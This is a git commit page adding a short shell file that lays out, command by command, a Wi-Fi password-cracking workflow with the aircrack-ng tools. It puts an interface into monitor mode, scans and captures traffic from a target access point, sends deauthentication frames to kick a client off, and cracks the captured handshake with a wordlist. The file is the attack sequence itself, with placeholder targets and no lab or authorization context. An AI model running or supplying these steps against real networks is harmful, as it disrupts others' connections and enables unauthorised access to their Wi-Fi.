shell script

This commit is contained in:
2026-05-22 15:21:21 +08:00
parent b84371b88b
commit d3594007ad
62 changed files with 8965 additions and 0 deletions
+7
View File
@@ -0,0 +1,7 @@
airmon-ng #Looking for device
airmon-ng start wlan0 #Start Listen Mode
airodump-ng wlan0mon #Scan surroudings wifi
airodump-ng -c ID --bssid address -w /file/name wlan0mon #Begin to capture packet
aireplay-ng -0 2 -a router -c client wlan0mon #Begin to De-authentication
aircrack-ng -w passwd name #Begin to attack packet
airmon-ng stop wlan0mon #Close Listen Mode